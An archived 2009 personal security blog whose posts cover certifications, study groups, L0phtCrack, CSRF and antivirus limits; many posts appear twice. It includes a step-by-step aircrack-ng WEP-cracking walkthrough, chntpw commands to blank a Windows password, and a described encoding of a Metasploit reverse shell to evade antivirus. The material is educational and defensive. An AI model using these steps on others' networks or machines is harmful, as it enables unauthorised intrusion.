So I think I have fallen into the same pit that many do with keeping up on a blog. Too many things going on and not enough time in the day. I wanted to post an update and hopefully resolve to update more often :)
So I have been reading a bunch on malware analysis. I have found myself doing this more and more at work. I really enjoy the process, which has lead me to dissect the topic. The last book which I just finished was "Malware Forensics: Investigating and Analyzing Malicious Code". The book was written well. The idea of it was that you had two incidents that you were investigating. One was on a Windows machine and the other was on a Linux machine. It then took you step by step into each.
The one thing I would probably offer in the way of criticism of the book would be to finish the Windows portion, then do the Linux portion. I found it difficult to keep my mind focused when it would switch from chapter to chapter. I would find myself wanting to skip to the next Windows or Linux section to see what happens next.
Now I am reading The Art of Computer Virus Reasarch and Defense. This book is a little dated but contains great material about how viri work. The most interesting thing I see is probably that Peter Szor was talking about the need to protect Javascript in Adobe applications, or types of worms called Octopus in which multiple systems communicate together to perform an action. These are things that are current and in some cases current of the past month or two and yet here they are written about in full detail years ago.
If I learned anything about this topic so far in this book, it is that virus writers are so far ahead, it's no wonder Anti Virus programs are so easy to beat. The techniques of the good virus writers (good as in ability, not in motive) are light years ahead of the people that probably defend these systems every day. I don't mean to say this to take away from any system, network or security admin out there, but they seem to have a large leg up.
We talk a lot about education being the key to winning this battle. I agree with this, however, I feel that the real education needs to come from the people protecting these systems, more than end user education. Now before I get flamed, I'm not saying that end user education isn't important as well; I'm just saying that if the people that know and understand these systems don't understand the vectors of attack, how can we expect end users who just expect things to work to understand the techniques?
In closing, the plan to meet every Saturday starting on the 16th of January to go over the Metasploit framework course offered by Offensive Security is still on. It will be at the Bowie, MD library. If you haven't received the dates please just contact me at nospamcshaffer which is at the gmail.com mail service. Of course remove nospam for the real address.
Sunday, December 27, 2009
Sunday, October 18, 2009
Security for Small Businesses
Most small businesses see IT security as a threat that doesn't really target them. I was over at the NIST website today and stumbled on some information they released for Cyber Security Awareness Month, which is this month if you didn't know :) The video was decent and brought up some good stats that I think any small business should listen to. A large percentage of small businesses experience laptop theft, insider abuse, virus infection and bot infection.
The page brings out that although as a one off, small businesses are small targets. However, when you take into account that small businesses make up what they are stating 95% of businesses in America and 50% of the nations gross national product, that isn't so small is it? Control of that could be quite devastating to the whole country.
They have released a 20 page guide outlining common things small businesses can do to help secure their networks. If you want a copy of this, or just want to watch the video, you can find them at the following links:
Article
Video
Security Document
SMB Security Page at NIST
The page brings out that although as a one off, small businesses are small targets. However, when you take into account that small businesses make up what they are stating 95% of businesses in America and 50% of the nations gross national product, that isn't so small is it? Control of that could be quite devastating to the whole country.
They have released a 20 page guide outlining common things small businesses can do to help secure their networks. If you want a copy of this, or just want to watch the video, you can find them at the following links:
Article
Video
Security Document
SMB Security Page at NIST
Saturday, October 10, 2009
Security Group Study
Calling anyone interested in security in the Washington DC area! I am trying to get a group together to have a group study effort to sharpen our general security and pentesting skills. I plan on finding a place where we can meet and go through the Offensive Security Metasploit Unleashed course. I think it will be a good way to get an introduction into general security as well as pentesting, but it will also help some who may know this already sharpen or help keep their skills sharp. I have not decided on a place to have this yet. I would like it to be as central as possible to the metro area so its as convenient as possible for everyone interested. If you have ideas for meeting places let me know.
The fee for this group effort will be $4 donation to Jonny Long's Hackers for Charity per the request of Offensive Security. Depending on the venue we may need to purchase drinks/food or some other customer item for the example of a Starbucks. If we can find a free place, that's great. I would like to have Internet available if possible, but hey, we're hackers I'm sure we can figure that one out :)
What do I need to participate?
Technically nothing. If you want to get the most out of it, being that this will be a meeting where a desktop will probably not be available, you should have a laptop that can run some virtual machines. The Offensive Security group has the requirements for the class here:
Lab Requirements
With that said, I have my laptop and one other I can bring. If anyone has extra laptops they can bring to the group meeting for people to use while they are there, that would be great. It will be more than just the lab as discussions will be a majority of the time. Thus, even if you don't have the gear, you will still learn a ton.
I will post again when more details are available. If you are interested please let me know by emailing me at pleasedontspam-cshaffergmailcom (remove the pleasedontspam- and of course add the @ and the . in their respective places :P)
Also if you are part of mailing lists or groups in the area, pass the info around.
The fee for this group effort will be $4 donation to Jonny Long's Hackers for Charity per the request of Offensive Security. Depending on the venue we may need to purchase drinks/food or some other customer item for the example of a Starbucks. If we can find a free place, that's great. I would like to have Internet available if possible, but hey, we're hackers I'm sure we can figure that one out :)
What do I need to participate?
Technically nothing. If you want to get the most out of it, being that this will be a meeting where a desktop will probably not be available, you should have a laptop that can run some virtual machines. The Offensive Security group has the requirements for the class here:
Lab Requirements
With that said, I have my laptop and one other I can bring. If anyone has extra laptops they can bring to the group meeting for people to use while they are there, that would be great. It will be more than just the lab as discussions will be a majority of the time. Thus, even if you don't have the gear, you will still learn a ton.
I will post again when more details are available. If you are interested please let me know by emailing me at pleasedontspam-cshaffer
Also if you are part of mailing lists or groups in the area, pass the info around.
New Blog
I have created a new blog. A new blog you say? We barely read this one :). This new one is more professional in nature. It is the beginning of a new open source community creating custom IPS signatures for Symantec Endpoint Protection. So the good news is, unless this is something you are interested in you can still get my normal great content here :). If it is something you are or may be interested in check it out!
Open Source SEP Signatures
Open Source SEP Signatures
Sunday, October 4, 2009
My Anti Virus will keep me safe and warm! Won't it?
There is always questions being asked to me as to what the best Anti Virus is. This is a difficult question. The truth of it is, they can all be beaten. I know that might come as a shock to you, maybe not, but it's very true. I decided to take this post and try to explain why this is difficult.
What I have done is created a simple backdoor trojan using our favorite Metasploit shell_reverse_tcp. I encoded it with Shikata_ga_nai. Loosely translated this is Japanese for "nothing can be done about it". This method basically utilized a polymorphic XOR additive feedback encoder. (for those of you unacclimated to this is means it has the ability to change things in what appears to be a random fashion.)
This is a simple shell code. It has a specific purpose to connect back to any system I tell it to. This should be caught by any normal means. I encoded one version with Shikata_ga_nai and built one version with no encoding. I uploaded both to VirusTotal. This site scans your files that you upload with 41 (at this time) different virus scanners and lets you know which ones found it malicious. Both versions were said to contain no malicious code. Now this could be an unfair test as it was simple code, so I decided to encode Netcat both ways and run that through. For those of you that are not familiar with Netcat; it is a back door program that can be used for good or bad but is definitely seen by major vendors as malicious. I again ran this through Virus Total and the unencoded version was caught 25 of the 41 vendors easily. The version I encoded was not recognized at all.
So what does it all mean Basil? It means that even all of those old viri can get past your anti virus. What you really need is an endpoint protection from companies such as Symantec, McAfee or Sophos. Why are they better? Because they are created to look for "odd" behavior rather than just a signature of the file. This is becoming more and more important as attacks and attackers are getting more complex.
For those of you that will still use the free anti virus programs out there, do what you can to keep them up to date, scan your systems often. Microsoft has released a free version of Anti Virus. You can get it here Microsoft Security Esstentials. Make sure you are downloading this from the Microsoft web site! There are many fakes out there already. I have not tested it fully, but the little I have tested it shows that it is pretty decent for free. It would be nice to run multiple anti virus programs but usually they fight with each other. I am testing this one with AVG on my wife's PC and will report back if they work well together or not. I also recommend running Malwarebytes as often as possible. Especially if you are a constant Facebook or Myspace user. Running it nightly might be a good choice.
As always, if you have any questions, let me know.
What I have done is created a simple backdoor trojan using our favorite Metasploit shell_reverse_tcp. I encoded it with Shikata_ga_nai. Loosely translated this is Japanese for "nothing can be done about it". This method basically utilized a polymorphic XOR additive feedback encoder. (for those of you unacclimated to this is means it has the ability to change things in what appears to be a random fashion.)
This is a simple shell code. It has a specific purpose to connect back to any system I tell it to. This should be caught by any normal means. I encoded one version with Shikata_ga_nai and built one version with no encoding. I uploaded both to VirusTotal. This site scans your files that you upload with 41 (at this time) different virus scanners and lets you know which ones found it malicious. Both versions were said to contain no malicious code. Now this could be an unfair test as it was simple code, so I decided to encode Netcat both ways and run that through. For those of you that are not familiar with Netcat; it is a back door program that can be used for good or bad but is definitely seen by major vendors as malicious. I again ran this through Virus Total and the unencoded version was caught 25 of the 41 vendors easily. The version I encoded was not recognized at all.
So what does it all mean Basil? It means that even all of those old viri can get past your anti virus. What you really need is an endpoint protection from companies such as Symantec, McAfee or Sophos. Why are they better? Because they are created to look for "odd" behavior rather than just a signature of the file. This is becoming more and more important as attacks and attackers are getting more complex.
For those of you that will still use the free anti virus programs out there, do what you can to keep them up to date, scan your systems often. Microsoft has released a free version of Anti Virus. You can get it here Microsoft Security Esstentials. Make sure you are downloading this from the Microsoft web site! There are many fakes out there already. I have not tested it fully, but the little I have tested it shows that it is pretty decent for free. It would be nice to run multiple anti virus programs but usually they fight with each other. I am testing this one with AVG on my wife's PC and will report back if they work well together or not. I also recommend running Malwarebytes as often as possible. Especially if you are a constant Facebook or Myspace user. Running it nightly might be a good choice.
As always, if you have any questions, let me know.
Tuesday, September 29, 2009
Forgot that Windows password?
So there are many ways to retrieve that lost Windows password. I just wanted to share this for those that might run into some problems that I have seen.
So you might run into a situation where you need to reset the local administrator password on a Windows box. You might reboot into something like NT PASSWORD. Now comes the problem. You boot into this and it doesn't want to mount your drives or doesn't seem to want to find the SAM file. I did notice this happens more often when the system has been shut down improperly. To fix that issue, just reboot into safe mode. This will normally let you shut down properly. You might have to do this more than once. If that still doesn't work, have no fear:
Boot into Backtrack. After your booted up, check your mounts with the mount command. If you see your Windows system partition, your set if not you should try to mount it with the following:
ntfs-3g /dev/sda2 /mnt/sda2 -o force
That should mount your drive, it does expect that your drive is sda2. If it is not, put your value here. If you don't know check your logs and dmesg to see what it might be.
After it is mounted cd into the /pentest/password/chntpw directory.
Run the following:
chntpw -l /mnt/sda2/WINDOWS/system32/config/SAM
This should list the users that exist in the SAM file on the local system.
To change the password do the following:
chntpw -u Administrator /mnt/sda2/WINDOWS/system32/config/SAM
*Note: If your username happens to contain a space put it in quotes*
This will present you with some options as to what to change. Choose to blank out the password. You can also set it, but I have found this way to be the easiest. You can set it to what you want it to once you get the box back up.
After you modify the password, write your changes. This may ask for you to run a disk check after you reboot. Skip this on the first boot. Change your password after it comes back up then you can reboot and let it do what it wants.
This isn't an exact step by step. It is taking into account that you have Linux experience and some familiarity with password reset procedures. I just wanted to share this because I have seen admins feel like they are out of luck after NT Password does not work. Have no fear! You do have another option.
Monday, September 14, 2009
WEP Y?
Wow! It is truely amazing just how many people still use WEP. I'm not going to go on a huge rant about this but if you are using it STOP! People often say, well it's better than nothing. I say not really. The reason I say this is because it gives you a sense of security that is false. Others say "but I don't have anything anyone would want". I say there are millions of identities stolen from home computers. Most wireless access points have WPA, use this. If it has WPA2 then that is even better. In the "it's better than nothing" category, I would say WPA is here with WPA2 being the best at this time for home use.
With that in mind, I thought I would show how easy it is to crack WEP in a few simple commands and the right, freely available, tools.
*Disclaimer: Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client.*
I will not be held liable for any misuse of this information!
Cracking WEP
1. Download the tools:
Backtrack 4
2. Boot into the Disk
3. Find a good target by running the following command:
airodump-ng wlan0 (just run airodump-ng by itself to find your interface name, mine happens to be wlan0)
4. Write down the BSSID, ESSID, and channel of the AP with the strongest signal (this one is normally near the top of the list)
5. Lock onto the target with the following command in a new terminal window:
airodump-ng -w wep -c 11 --bssid 00:00:00:00:00:00 wlan0 (here WEP is the encryption type, -c is the channel, in this example it is 11 but enter the value you saved in step 4, the bssid will not be all zeros either, enter the BSSID you wrote down in step 4 in the style I wrote the zeros)
6. Attempt association to the AP with the following command in another terminal window:
aireplay-ng -1 0 -a 00:00:00:00:00:00 wlan0 (here again the bssid should not be zeros but the value you have from step 4)
7. Hopefully your card supports packet re-injection. This basically means when it finds some interesting traffic that it can recognize, it will replay that packet back into the network and make this process much faster. Do this step by typing the following in yet another terminal window:
aireplay-ng -3 -b 00:00:00:00:00:00 wlan0 (Remember not zeros but the step 4 BSSID here)
8. Once you see the "data" section get to somewhere between 20K and 30K you should be good to go. do an ls -la to capture the file name that was created. It is the file with the .cap extension.
9. Armed with that information run the following command to crack the WEP key
aircrack-ng filename (remember it should look like wep02.cap or something else with the .cap extension)
This final step is the quickest. Depending on if your wireless card supports packet re-injection, it could take a while to capture the needed traffic to get the pieces you need to crack WEP. If your card is fully supported with re-injection, this will probably take no more than 15 minutes as an average. You can run the crack command at random intervals during the capture process to see if you got it yet, though I recommend just waiting until you get 20-30K data numbers. I haven't seen it really work with less than that. Not saying it doesn't, I just haven't seen it.
So there you have it. Scary huh? It is. Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client. I didn't give you this so you can go cracking your neighbor's wireless connection :)
With that in mind, I thought I would show how easy it is to crack WEP in a few simple commands and the right, freely available, tools.
*Disclaimer: Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client.*
I will not be held liable for any misuse of this information!
Cracking WEP
1. Download the tools:
Backtrack 4
2. Boot into the Disk
3. Find a good target by running the following command:
airodump-ng wlan0 (just run airodump-ng by itself to find your interface name, mine happens to be wlan0)
4. Write down the BSSID, ESSID, and channel of the AP with the strongest signal (this one is normally near the top of the list)
5. Lock onto the target with the following command in a new terminal window:
airodump-ng -w wep -c 11 --bssid 00:00:00:00:00:00 wlan0 (here WEP is the encryption type, -c is the channel, in this example it is 11 but enter the value you saved in step 4, the bssid will not be all zeros either, enter the BSSID you wrote down in step 4 in the style I wrote the zeros)
6. Attempt association to the AP with the following command in another terminal window:
aireplay-ng -1 0 -a 00:00:00:00:00:00 wlan0 (here again the bssid should not be zeros but the value you have from step 4)
7. Hopefully your card supports packet re-injection. This basically means when it finds some interesting traffic that it can recognize, it will replay that packet back into the network and make this process much faster. Do this step by typing the following in yet another terminal window:
aireplay-ng -3 -b 00:00:00:00:00:00 wlan0 (Remember not zeros but the step 4 BSSID here)
8. Once you see the "data" section get to somewhere between 20K and 30K you should be good to go. do an ls -la to capture the file name that was created. It is the file with the .cap extension.
9. Armed with that information run the following command to crack the WEP key
aircrack-ng filename (remember it should look like wep02.cap or something else with the .cap extension)
This final step is the quickest. Depending on if your wireless card supports packet re-injection, it could take a while to capture the needed traffic to get the pieces you need to crack WEP. If your card is fully supported with re-injection, this will probably take no more than 15 minutes as an average. You can run the crack command at random intervals during the capture process to see if you got it yet, though I recommend just waiting until you get 20-30K data numbers. I haven't seen it really work with less than that. Not saying it doesn't, I just haven't seen it.
So there you have it. Scary huh? It is. Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client. I didn't give you this so you can go cracking your neighbor's wireless connection :)
Monday, August 24, 2009
Personal Identification Disclosure
So I have been looking to rent a new place as I moved back to the DC metro area. What I have found is an exuberant amount of people that are asking for a ridiculous amount of personal information. They are asking for SSN, checks which would obviously include account and routing information, and I even had one person asking to set up the ability for them to auto charge my account for the monthly rent and yet another asking for a photocopy of 2 picture IDs and my SSN card!
I have probably found myself looking for this stuff more and more lately but I find this outrageous. My general question is; Am I being over paranoid or is it correct of me to deny them these things? It’s bad enough that I need to keep thieves from gaining access to this via my personal space, but now I need to put reliance on these people, which most are arguably ignorant about computer and general security, from getting hacked and exposing my information.
What ways are there to get around this? Obviously I see their side of wanting this information, but they should understand this side as well. Explaining this to them is quite difficult though unless they have been a victim of such a crime. I thought about running the credit checks myself and scrubbing the information and just denying the existence of a personal checking account. Any other suggestions?
I have probably found myself looking for this stuff more and more lately but I find this outrageous. My general question is; Am I being over paranoid or is it correct of me to deny them these things? It’s bad enough that I need to keep thieves from gaining access to this via my personal space, but now I need to put reliance on these people, which most are arguably ignorant about computer and general security, from getting hacked and exposing my information.
What ways are there to get around this? Obviously I see their side of wanting this information, but they should understand this side as well. Explaining this to them is quite difficult though unless they have been a victim of such a crime. I thought about running the credit checks myself and scrubbing the information and just denying the existence of a personal checking account. Any other suggestions?
Tuesday, August 18, 2009
SANS 560 anyone?
I was extended an invitation to become a SANS mentor. This means I will be running some classes real soon. I will be starting with offering the 560. This is the class you would take to obtain your GPEN certification. Time and place to be announced soon. If you are interested, drop me a line and let me know. I'll get you on the list. Here is the link of the course and what is included:
SANS 560
SANS 560
I Can't hear you now! :(
You read that correctly. I was unable to get a good test with the bluetooth hacking this weekend. The reason? It appears that when you pass your bluetooth through to a virtual machine on your Mac, you loose a lot of the needed functionality. Yes, yes I know. You are thinking why didn't you just get carwhisperer to work on the Mac or try the Windows route, or boot your Dell into Backtrack?
The truth is that I wanted to see it work this way. I really like the idea of having one laptop that can do everything I need to do with the use of VMWare. Alas, this is not the case yet; at least not without getting external wifi and bluetooth dongles. I will attempt again this weekend with the Dell and Backtrack.
I did find something else interesting though....the PS3 has bluetooth. My goal may be to see what kind of cool stuff I can do there as well.
The truth is that I wanted to see it work this way. I really like the idea of having one laptop that can do everything I need to do with the use of VMWare. Alas, this is not the case yet; at least not without getting external wifi and bluetooth dongles. I will attempt again this weekend with the Dell and Backtrack.
I did find something else interesting though....the PS3 has bluetooth. My goal may be to see what kind of cool stuff I can do there as well.
Friday, August 14, 2009
Can you hear me now?
OK, OK my posting has been a bit spotty. I'm trying :) So anyway why I am posting today.... Can you hear me now? Reminds you of a Verizon commercial. Well, this post has to do with...well cell phones, and bluetooth headsets. You may have all been reading how vulnerable bluetooth is. Do you know just have vulnerable? Check out the following video by Josh Wright:
I Can I hear you now!
So how scary is that? Bet you will think twice about wearing one of those bad boys now :). That got me thinking, those of you that know me you know how that goes! If we can eavesdrop/inject on bluetooth headsets then I bet we can eavesdrop/inject on car bluetooth systems. Well...I hope to test this tomorrow and see. I'm traveling back from PA in the AM and will have a few hours at my disposal. If by some reason I am too tired, it will be done this weekend and I will post my results here. This can have a very scary outcome. Lets hope more thought was put into the car bluetooth setup though...yeah right!
I Can I hear you now!
So how scary is that? Bet you will think twice about wearing one of those bad boys now :). That got me thinking, those of you that know me you know how that goes! If we can eavesdrop/inject on bluetooth headsets then I bet we can eavesdrop/inject on car bluetooth systems. Well...I hope to test this tomorrow and see. I'm traveling back from PA in the AM and will have a few hours at my disposal. If by some reason I am too tired, it will be done this weekend and I will post my results here. This can have a very scary outcome. Lets hope more thought was put into the car bluetooth setup though...yeah right!
Monday, July 20, 2009
Passed the GPEN!
Just wanted to share that I passed the GPEN exam! Got a 90%. It was one of those exams that showed you your progress. This was a blessing and curse. It was nice to know I passed after getting 105 questions correct, but since I knew I passed at that time, it was easy to slack off toward the end and I missed a number of questions because of it.
I put in my application for my GPEN gold. The paper title is: "Identifying Load Balancers in Penetration Testing". The application was approved. I will begin work on the paper starting around the 10th of next month. It is a 6 month process so more to come on that. I have a lot of work ahead of me.
In the mean time, still being on track with my certification goals, I began studying for the CISSP yesterday. I hope to have it done before the years end. (If anyone else is studying for this one as well and would like to get together online or in person to study, let me know) That was the goal I set forth. Then in the beginning of next year I will be finishing my GPEN gold paper and starting to get ready for the GSEC towards my GSE.
I put in my application for my GPEN gold. The paper title is: "Identifying Load Balancers in Penetration Testing". The application was approved. I will begin work on the paper starting around the 10th of next month. It is a 6 month process so more to come on that. I have a lot of work ahead of me.
In the mean time, still being on track with my certification goals, I began studying for the CISSP yesterday. I hope to have it done before the years end. (If anyone else is studying for this one as well and would like to get together online or in person to study, let me know) That was the goal I set forth. Then in the beginning of next year I will be finishing my GPEN gold paper and starting to get ready for the GSEC towards my GSE.
Friday, July 10, 2009
XSS?
Where have you been Curt? Well as some of you may know I'm getting real close to taking the GPEN certification exam. Next week in fact! So I have been trying to study hard and keeping focused. I did want to give you guys a new post though to ensure you that I'm still here and still plan on keeping up on my musings.
Have you heard of XSRF? You might have heard it called cross site request forgery. This is a dangerous attack vector that people can used to do all sorts of nasty things. Take for example, this cool picture of cookie monster:
What picture of cookie monster you might ask? You may see nothing above or you may see a little white box with a red x in it or a box with a ripped file inside. You see what just happened is I executed a bit of code for your system to run. What code? Well if you had a bank account with my bank, I would have just transferred $13000 from your account to mine :) Thanks! There are something things that would need to be in place for this to happen though.
What I would need to do is have you look at this blog posting while you were logged into your online banking. This isn't that difficult as a lot of people multi task. You may say "but I don't normally browse when I bank". That is fine too. I can also use this code to have you execute a command of my choosing to any site you may be logged into at the moment. i.e. How about changing your Facebook, Myspace, or ebay password so I can highjack it for example?
Why would the other page accept this junk? The short answer is that it does this because I use your cookie (or session) to tell it what to do. Since you authenticated to that site, it thinks you are requesting this information so it subserviently obliges.
Why all of the bad news? Well I want you all to be aware of the things that can happen very simply on the Internet. The good news to this is that websites such as your bank, ebay and others are doing all they can to help stop this. It is an uphill battle though so don't expect it to end completely. As long as there is crime in the world there will be people coming up with new ways to steal your information.
How can we protect against this Curt? Again, this is difficult to say because the dynamic changes all of the time. One thing that would help here is to turn on, or off, the setting in your browser to not allow third party images. In Firefox there is a setting you can disable called Load images automatically. IE 8 actually has a nice new feature that allows you to block third party images from a website, much like how I ran the code above. This may cause issue with your page displaying properly. I guess it's about how far you want to go. Alternately you can choose the option to clear cache, cookies and offline content every time you close your browser. This does mean you will have to log in every time you vist those types of sites that require it. You can also close your browser and reopen it after doing online transactions and logging out of those pages. It does seem that more and more pages of this sort are providing you with that request when you log off already, which is a good thing. That clears the session and if you are clearing your cookies and such on exit then it takes the option away from the attacker.
Be safe on the Internet. It's not a land of milk and honey! It's a warzone where many unsuspecting people get caught in crossfires and direct attacks. You can enjoy the convienance and productivity that it brings, just be cautious. As always, if you have any further questions, let me know!
Have you heard of XSRF? You might have heard it called cross site request forgery. This is a dangerous attack vector that people can used to do all sorts of nasty things. Take for example, this cool picture of cookie monster:
What picture of cookie monster you might ask? You may see nothing above or you may see a little white box with a red x in it or a box with a ripped file inside. You see what just happened is I executed a bit of code for your system to run. What code? Well if you had a bank account with my bank, I would have just transferred $13000 from your account to mine :) Thanks! There are something things that would need to be in place for this to happen though.
What I would need to do is have you look at this blog posting while you were logged into your online banking. This isn't that difficult as a lot of people multi task. You may say "but I don't normally browse when I bank". That is fine too. I can also use this code to have you execute a command of my choosing to any site you may be logged into at the moment. i.e. How about changing your Facebook, Myspace, or ebay password so I can highjack it for example?
Why would the other page accept this junk? The short answer is that it does this because I use your cookie (or session) to tell it what to do. Since you authenticated to that site, it thinks you are requesting this information so it subserviently obliges.
Why all of the bad news? Well I want you all to be aware of the things that can happen very simply on the Internet. The good news to this is that websites such as your bank, ebay and others are doing all they can to help stop this. It is an uphill battle though so don't expect it to end completely. As long as there is crime in the world there will be people coming up with new ways to steal your information.
How can we protect against this Curt? Again, this is difficult to say because the dynamic changes all of the time. One thing that would help here is to turn on, or off, the setting in your browser to not allow third party images. In Firefox there is a setting you can disable called Load images automatically. IE 8 actually has a nice new feature that allows you to block third party images from a website, much like how I ran the code above. This may cause issue with your page displaying properly. I guess it's about how far you want to go. Alternately you can choose the option to clear cache, cookies and offline content every time you close your browser. This does mean you will have to log in every time you vist those types of sites that require it. You can also close your browser and reopen it after doing online transactions and logging out of those pages. It does seem that more and more pages of this sort are providing you with that request when you log off already, which is a good thing. That clears the session and if you are clearing your cookies and such on exit then it takes the option away from the attacker.
Be safe on the Internet. It's not a land of milk and honey! It's a warzone where many unsuspecting people get caught in crossfires and direct attacks. You can enjoy the convienance and productivity that it brings, just be cautious. As always, if you have any further questions, let me know!
Wednesday, June 17, 2009
Mentioned on another blog
Some of you may know, but then some of you may not. Yesterday I was mentioned on the CommandLine kung fu blog. Now it was no big deal, like new spolit found or new rockin code, but it's nice to be mentioned and associated with individuals such as Ed Skoudis and the other folks that maintain the blog. I submitted a question/suggestion for them to discuss command output redirection. They did an excellent job in covering the material and I hope a lot of people learned as much from it as I did! Thanks guys!
I did not get to testing the new l0phtcrack this weekend. I ended up playing with my Mac the whole time :) I'm just about completey over to it now. I'm giving Entourage a try over Outlook. So far it's not that bad. The only issue I have remaining is that the SANS @home sessions will not play on my Mac. I have a ticket open with them to try to fix this. It's not a show stopper though as I have VMWare fusion installed and running Windows 7 which runs the sessions fine. So long story short, I hope to get to testing soon. I'm tied up at work all weekend this weekend but maybe during my downtime I can see what I can do. I'm also trying to go through the SANS 560 and 561 class materials one last time before taking the GPEN test. My hope is to take it in the middle of next month so I can get started on my CISSP.
More later, hopefully a full review of l0pht vs. some of the other free password crackers out there!
I did not get to testing the new l0phtcrack this weekend. I ended up playing with my Mac the whole time :) I'm just about completey over to it now. I'm giving Entourage a try over Outlook. So far it's not that bad. The only issue I have remaining is that the SANS @home sessions will not play on my Mac. I have a ticket open with them to try to fix this. It's not a show stopper though as I have VMWare fusion installed and running Windows 7 which runs the sessions fine. So long story short, I hope to get to testing soon. I'm tied up at work all weekend this weekend but maybe during my downtime I can see what I can do. I'm also trying to go through the SANS 560 and 561 class materials one last time before taking the GPEN test. My hope is to take it in the middle of next month so I can get started on my CISSP.
More later, hopefully a full review of l0pht vs. some of the other free password crackers out there!
Thursday, June 11, 2009
Life on a Mac
Well, I finally got my new Mac. In short, I'm really happy with it. I haven't had much time to actually play with it because of other things I have needed to do. So far though I am very happy with it. Yes happy enough that I will probably not purchase a PC laptop for the purpose of my personal use again! I have converted.
The major thing I'm trying to figure out is which way to go with virtualization. I have installed Parallels because I have seen some interesting things as far as it's interaction with the OS. Being able to just launch necessary Windows applications from the system and have it in a window like any other app is nice. I'm a big fan of VMWare so fusion it is obviously my other choice. I have a 14 day trial of Parallels and then I will attempt a trial of Fusion. I'm going to give them both a shot before I make my decision. With that siad though, that makes my complete move to the Mac not done yet. I still have the Dell close at hand. Mainly all of my email is in Outlook and my bookmarks are still on there. I do have data which needs to be moved still as well but those are about the only reason I'm not completely switched.
I have not moved Outlook over because I am not sold on a particular virtual application yet. I know Mac has the built in Mail client, maybe I'll switch to that too but I'm not sure yet. I choose to install Windows 7 in the virtual environment. So far to me it is pretty much Vista. It does seem to run well and there are some dialog box changes and some sort of change in workgroup that makes it almost seem domain like with a password for access and such. All of that investigation will be for anoher day. Anyway, short post, I just wanted to update. I still have plans on testing out the password tools this weekend and I will post the results here.
The major thing I'm trying to figure out is which way to go with virtualization. I have installed Parallels because I have seen some interesting things as far as it's interaction with the OS. Being able to just launch necessary Windows applications from the system and have it in a window like any other app is nice. I'm a big fan of VMWare so fusion it is obviously my other choice. I have a 14 day trial of Parallels and then I will attempt a trial of Fusion. I'm going to give them both a shot before I make my decision. With that siad though, that makes my complete move to the Mac not done yet. I still have the Dell close at hand. Mainly all of my email is in Outlook and my bookmarks are still on there. I do have data which needs to be moved still as well but those are about the only reason I'm not completely switched.
I have not moved Outlook over because I am not sold on a particular virtual application yet. I know Mac has the built in Mail client, maybe I'll switch to that too but I'm not sure yet. I choose to install Windows 7 in the virtual environment. So far to me it is pretty much Vista. It does seem to run well and there are some dialog box changes and some sort of change in workgroup that makes it almost seem domain like with a password for access and such. All of that investigation will be for anoher day. Anyway, short post, I just wanted to update. I still have plans on testing out the password tools this weekend and I will post the results here.
Monday, June 8, 2009
L0pth iz Back!
You read it correctly. The great password cracking tool is back in action. Many of you may remember this tool. It worked great and I know a lot of people that had it previously that still used it to this day. The tool was created by the L0pthcrack team some years ago. This was purchased by @stake which was then purchased by Symantec. For some reason at that time the tool disappeared from availability. This was a sad time in password cracking history. The good news is that it is now back and better than ever. I haven't installed it yet, as you may know I'm due to get my new Mac today and will probably reinstall this laptop with Windows 7 to get better performance. From what I am reading thought some of the new features are:
"
L0phtCrack 6 is packed with powerful features such as scheduling, hash extraction from 64 bit Windows versions, multiprocessor algorithms, and networks monitoring and decoding. Yet it is still the easiest to use password auditing and recovery software available.
Password Scoring
L0phtCrack 6 provides a scoring metric to quickly assess password quality. Passwords are measured against current industry best practices, and are rated as Strong, Medium, Weak, or Fail.
Pre-computed Dictionary Support
Pre-computed password files is a must have feature in password auditing. L0phtCrack 6 supports pre-computed password hashes. Password audits now take minutes instead of hours or days.
Windows & Unix Password Support
L0phtCrack 6 imports and cracks Unix password files. Perform network audits from a single interface.
Remote password retrieval
L0phtCrack 6 has a built-in ability to import passwords from remote Windows, including 64-bit versions of Vista, Windows 7, and Unix machines, without requiring a third-party utility.
Scheduled Scans
System administrators can schedule routine audits with L0phtCrack 6. Audits can be performed daily, weekly, monthly, or just once, depending on the organization's auditing requirements.
Remediation
L0phtCrack 6 offers remediation assistance to system administrators on how to take action against accounts that have poor passwords. Accounts can be disabled, or the passwords can be set to expire from within the L0phtCrack 6 interface. Remediation works for Windows user accounts only.
Updated Vista/Windows 7 Style UI
The user interface is improved and updated. More information is available about each user account, including password age, lock-out status, and whether the account is disabled, expired, or never expires. Information on L0phtCrack 6's current session is provided in an "immediate window" with a reporting tab providing up-to-the-minute status of the current auditing session."
To learn more check out their page at L0phtCrack. I'm going to run some benchmarks on this guy this coming weekend. I'm probably gonna put it up against 0phcrack and John the Ripper. Unfortunately, I do not have a 64bit machine to test with but the new Mac is multi core so we can see how much it can take advantage of it. That is if it runs well in a virtual environment as I don't see a Mac version.
"
L0phtCrack 6 is packed with powerful features such as scheduling, hash extraction from 64 bit Windows versions, multiprocessor algorithms, and networks monitoring and decoding. Yet it is still the easiest to use password auditing and recovery software available.
Password Scoring
L0phtCrack 6 provides a scoring metric to quickly assess password quality. Passwords are measured against current industry best practices, and are rated as Strong, Medium, Weak, or Fail.
Pre-computed Dictionary Support
Pre-computed password files is a must have feature in password auditing. L0phtCrack 6 supports pre-computed password hashes. Password audits now take minutes instead of hours or days.
Windows & Unix Password Support
L0phtCrack 6 imports and cracks Unix password files. Perform network audits from a single interface.
Remote password retrieval
L0phtCrack 6 has a built-in ability to import passwords from remote Windows, including 64-bit versions of Vista, Windows 7, and Unix machines, without requiring a third-party utility.
Scheduled Scans
System administrators can schedule routine audits with L0phtCrack 6. Audits can be performed daily, weekly, monthly, or just once, depending on the organization's auditing requirements.
Remediation
L0phtCrack 6 offers remediation assistance to system administrators on how to take action against accounts that have poor passwords. Accounts can be disabled, or the passwords can be set to expire from within the L0phtCrack 6 interface. Remediation works for Windows user accounts only.
Updated Vista/Windows 7 Style UI
The user interface is improved and updated. More information is available about each user account, including password age, lock-out status, and whether the account is disabled, expired, or never expires. Information on L0phtCrack 6's current session is provided in an "immediate window" with a reporting tab providing up-to-the-minute status of the current auditing session."
